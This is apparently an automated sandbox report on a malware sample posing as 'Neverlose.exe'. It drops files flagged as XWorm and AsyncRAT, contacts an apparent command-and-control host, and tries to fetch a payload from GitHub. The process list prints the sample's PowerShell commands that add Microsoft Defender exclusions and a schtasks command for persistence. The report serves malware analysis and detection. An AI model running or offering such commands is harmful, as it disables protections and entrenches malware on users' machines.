                                                              Aug 24, 2024 21:55:06.989398956 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.989408016 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989455938 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989495039 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989538908 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.989545107 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990251064 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990284920 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990293026 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.990298986 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.993079901 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.993087053 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:07.001943111 CEST49732443192.168.2.4140.82.121.4
Aug 24, 2024 21:56:27.234853983 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:27.239749908 CEST | 14520 | 49740 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:27.239815950 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:27.344769001 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:27.349965096 CEST | 14520 | 49740 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:40.575408936 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:40.580390930 CEST | 14520 | 49740 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:48.603740931 CEST | 14520 | 49740 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:48.603975058 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:50.932372093 CEST | 49740 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:50.934443951 CEST | 49741 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:50.937880039 CEST | 14520 | 49740 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:50.939851999 CEST | 14520 | 49741 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:56:50.939924002 CEST | 49741 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:51.145322084 CEST | 49741 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:56:51.150255919 CEST | 14520 | 49741 | 147.185.221.22 | 192.168.2.4
Aug 24, 2024 21:57:03.276679039 CEST | 49741 | 14520 | 192.168.2.4    | 147.185.221.22
Aug 24, 2024 21:57:03.281585932 CEST | 14520 | 49741 | 147.185.221.22 | 192.168.2.4
Timestamp                            | Source Port | Dest Port | Source IP   | Dest IP
Aug 24, 2024 21:55:02.929810047 CEST | 64572       | 53        | 192.168.2.4 | 1.1.1.1
Aug 24, 2024 21:55:03.916169882 CEST | 64572       | 53        | 192.168.2.4 | 1.1.1.1
Aug 24, 2024 21:55:03.955718994 CEST | 53          | 64572     | 1.1.1.1     | 192.168.2.4
Aug 24, 2024 21:55:03.958954096 CEST | 53          | 64572     | 1.1.1.1     | 192.168.2.4
Aug 24, 2024 21:55:05.261521101 CEST | 64724       | 53        | 192.168.2.4 | 1.1.1.1
Aug 24, 2024 21:55:05.274218082 CEST | 53          | 64724     | 1.1.1.1     | 192.168.2.4
Aug 24, 2024 21:56:27.184828043 CEST | 52358       | 53        | 192.168.2.4 | 1.1.1.1
Aug 24, 2024 21:56:27.225749969 CEST | 53          | 52358     | 1.1.1.1     | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 24, 2024 21:55:02.929810047 CEST | 192.168.2.4 | 1.1.1.1 | 0x2c37 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:03.916169882 CEST | 192.168.2.4 | 1.1.1.1 | 0x2c37 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:05.261521101 CEST | 192.168.2.4 | 1.1.1.1 | 0x19c4 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:56:27.184828043 CEST | 192.168.2.4 | 1.1.1.1 | 0xdcc9 | Standard query (0) | 22.ip.gl.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 24, 2024 21:55:03.955718994 CEST | 1.1.1.1 | 192.168.2.4 | 0x2c37 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:03.958954096 CEST | 1.1.1.1 | 192.168.2.4 | 0x2c37 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:05.274218082 CEST | 1.1.1.1 | 192.168.2.4 | 0x19c4 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:05.274218082 CEST | 1.1.1.1 | 192.168.2.4 | 0x19c4 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:05.274218082 CEST | 1.1.1.1 | 192.168.2.4 | 0x19c4 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:55:05.274218082 CEST | 1.1.1.1 | 192.168.2.4 | 0x19c4 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Aug 24, 2024 21:56:27.225749969 CEST | 1.1.1.1 | 192.168.2.4 | 0xdcc9 | No error (0) | 22.ip.gl.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
                                                              • github.com
                                                              • raw.githubusercontent.com
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.4 | 49730       | 140.82.121.4   | 443              | 7200 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-24 19:55:04 UTC | 105 | OUT | GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-08-24 19:55:05 UTC | 473 | IN | HTTP/1.1 404 Not Found
    Server: GitHub.com
    Date: Sat, 24 Aug 2024 19:55:04 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
1          | 192.168.2.4 | 49731       | 185.199.109.133 | 443              | 7200 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-24 19:55:05 UTC | 135 | OUT | GET /quivings/Solara/main/Storage/version.txt HTTP/1.1
    User-Agent: Solara
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-08-24 19:55:05 UTC | 801 | IN | HTTP/1.1 404 Not Found
    Connection: close
    Content-Length: 14
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    Content-Type: text/plain; charset=utf-8
    X-GitHub-Request-Id: FE3C:A4EB4:914EDB:A2C9D5:66CA3A99
    Accept-Ranges: bytes
    Date: Sat, 24 Aug 2024 19:55:05 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740072-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1724529306.809325,VS0,VE8
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: bdaf9571f5649794f8b717df41ba184de9a7a2f1
    Expires: Sat, 24 Aug 2024 20:00:05 GMT
    Source-Age: 0
2024-08-24 19:55:05 UTC | 14 | IN | Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
    Data Ascii: 404: Not Found


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.4 | 49732       | 140.82.121.4   | 443              | 7200 | C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-24 19:55:06 UTC | 81 | OUT | GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
    Host: github.com
2024-08-24 19:55:06 UTC | 473 | IN | HTTP/1.1 404 Not Found
    Server: GitHub.com
    Date: Sat, 24 Aug 2024 19:55:04 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin

                                                              Target ID:0
                                                              Start time:15:54:55
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\Desktop\Neverlose.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Neverlose.exe"
                                                              Imagebase:0xff0000
                                                              File size:1'189'376 bytes
                                                              MD5 hash:39D6EC26690FFEE2E74FB9694B30453C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:15:54:57
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                              Imagebase:0x910000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:15:54:57
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0xda0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 76%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                              Imagebase:0x8c0000
                                                              File size:13'312 bytes
                                                              MD5 hash:6557BD5240397F026E675AFB78544A26
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 33%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:15:55:05
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:15:55:05
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6795a0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:15:55:14
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0x6e0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:15:55:19
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:15:55:19
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:15:55:23
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0x620000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:15:55:36
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:15:55:36
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:15:55:58
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:15:55:58
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:15:56:25
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x7ff76f990000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:15:56:25
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:15:56:27
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Imagebase:0xb00000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 76%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:15:56:37
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x2c0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:15:56:45
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\sv_chost.exe"
                                                              Imagebase:0x6a0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:6.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:2
                                                                Total number of Limit Nodes:0
                                                                execution_graph 27788 1175598 27789 11755a5 VirtualAlloc 27788->27789

                                                                Control-flow Graph

                                                                control_flow_graph 0 2e747a0-2e747d6 124 2e747d8 call 2e740f0 0->124 125 2e747d8 call 2e747a0 0->125 1 2e747de-2e747e4 2 2e747e6-2e747ea 1->2 3 2e74834-2e74838 1->3 4 2e747ec-2e747f1 2->4 5 2e747f9-2e74800 2->5 6 2e7484f-2e74863 3->6 7 2e7483a-2e74849 3->7 4->5 9 2e748d6-2e74913 5->9 10 2e74806-2e7480d 5->10 8 2e7486b-2e74872 6->8 11 2e74875-2e7487f 7->11 12 2e7484b-2e7484d 7->12 22 2e74915-2e7491b 9->22 23 2e7491e-2e7493e 9->23 10->3 15 2e7480f-2e74813 10->15 13 2e74881-2e74887 11->13 14 2e74889-2e7488d 11->14 12->8 17 2e74895-2e748cf 13->17 14->17 18 2e7488f 14->18 19 2e74815-2e7481a 15->19 20 2e74822-2e74829 15->20 17->9 18->17 19->20 20->9 21 2e7482f-2e74832 20->21 21->8 22->23 28 2e74945-2e7494c 23->28 29 2e74940 23->29 32 2e7494e-2e74959 28->32 31 2e74cd4-2e74cdd 29->31 33 2e74ce5-2e74cf2 32->33 34 2e7495f-2e74972 32->34 39 2e74974-2e74982 34->39 40 2e74988-2e749a3 34->40 39->40 43 2e74c5c-2e74c63 39->43 44 2e749c7-2e749ca 40->44 45 2e749a5-2e749ab 40->45 43->31 48 2e74c65-2e74c67 43->48 49 2e74b24-2e74b2a 44->49 50 2e749d0-2e749d3 44->50 46 2e749b4-2e749b7 45->46 47 2e749ad 45->47 52 2e749ea-2e749f0 46->52 53 2e749b9-2e749bc 46->53 47->46 47->49 51 2e74c16-2e74c19 47->51 47->52 54 2e74c76-2e74c7c 48->54 55 2e74c69-2e74c6e 48->55 49->51 56 2e74b30-2e74b35 49->56 50->49 57 2e749d9-2e749df 50->57 58 2e74ce0 51->58 59 2e74c1f-2e74c25 51->59 60 2e749f6-2e749f8 52->60 61 2e749f2-2e749f4 52->61 62 2e74a56-2e74a5c 53->62 63 2e749c2 53->63 54->33 64 2e74c7e-2e74c83 54->64 55->54 56->51 57->49 65 2e749e5 57->65 58->33 67 2e74c27-2e74c2f 59->67 68 2e74c4a-2e74c4e 59->68 69 2e74a02-2e74a0b 60->69 61->69 62->51 66 2e74a62-2e74a68 62->66 63->51 70 2e74c85-2e74c8a 64->70 71 2e74cc8-2e74ccb 64->71 65->51 72 2e74a6e-2e74a70 66->72 73 2e74a6a-2e74a6c 66->73 67->33 74 2e74c35-2e74c44 67->74 68->43 77 2e74c50-2e74c56 68->77 75 2e74a1e-2e74a46 69->75 76 2e74a0d-2e74a18 69->76 70->58 79 2e74c8c 70->79 71->58 78 
2e74ccd-2e74cd2 71->78 81 2e74a7a-2e74a91 72->81 73->81 74->40 74->68 99 2e74a4c-2e74a51 75->99 100 2e74b3a-2e74b70 75->100 76->51 76->75 77->32 77->43 78->31 78->48 80 2e74c93-2e74c98 79->80 82 2e74cba-2e74cbc 80->82 83 2e74c9a-2e74c9c 80->83 92 2e74a93-2e74aac 81->92 93 2e74abc-2e74ae3 81->93 82->58 90 2e74cbe-2e74cc1 82->90 87 2e74c9e-2e74ca3 83->87 88 2e74cab-2e74cb1 83->88 87->88 88->33 91 2e74cb3-2e74cb8 88->91 90->71 91->82 95 2e74c8e-2e74c91 91->95 92->100 105 2e74ab2-2e74ab7 92->105 93->58 104 2e74ae9-2e74aec 93->104 95->58 95->80 99->100 106 2e74b72-2e74b76 100->106 107 2e74b7d-2e74b85 100->107 104->58 108 2e74af2-2e74b1b 104->108 105->100 109 2e74b95-2e74b99 106->109 110 2e74b78-2e74b7b 106->110 107->58 111 2e74b8b-2e74b90 107->111 108->100 123 2e74b1d-2e74b22 108->123 112 2e74b9b-2e74ba1 109->112 113 2e74bb8-2e74bbc 109->113 110->107 110->109 111->51 112->113 115 2e74ba3-2e74bab 112->115 116 2e74bc6-2e74be2 113->116 117 2e74bbe-2e74bc4 113->117 115->58 118 2e74bb1-2e74bb6 115->118 120 2e74beb-2e74bef 116->120 117->116 117->120 118->51 120->51 121 2e74bf1-2e74c0d 120->121 121->51 123->100 124->1 125->1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                • API String ID: 0-2525668591
                                                                • Opcode ID: 75e15723d66893caddab3b8e94c64067e0a099765903dd0b5fe1200803ad5de2
                                                                • Instruction ID: 811209f8e861318d175e2b9a98fd4f8e9a15d85bf8ff703dfba155b850790f41
                                                                • Opcode Fuzzy Hash: 75e15723d66893caddab3b8e94c64067e0a099765903dd0b5fe1200803ad5de2
                                                                • Instruction Fuzzy Hash: 12024D75A40119DFDB14CFA9D984AAEBBF2FF88308F15D169E415AB2A1D730EC41CB60
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o^q$Hbq
                                                                • API String ID: 0-662517225
                                                                • Opcode ID: 9fff27da940dc3bb7300e3cdff1391bfa03d59904dedddf9aa25bd1b1212991a
                                                                • Instruction ID: d237bd09f02dcb2bf7ba13f1c3e02143eec3cdff7b02a0fb913f50ccba65fd57
                                                                • Opcode Fuzzy Hash: 9fff27da940dc3bb7300e3cdff1391bfa03d59904dedddf9aa25bd1b1212991a
                                                                • Instruction Fuzzy Hash: 73228C71A402199FDB14DF69D854BAEBBF6BF88304F248569E509EB391DB30DC42CB90

                                                                Control-flow Graph

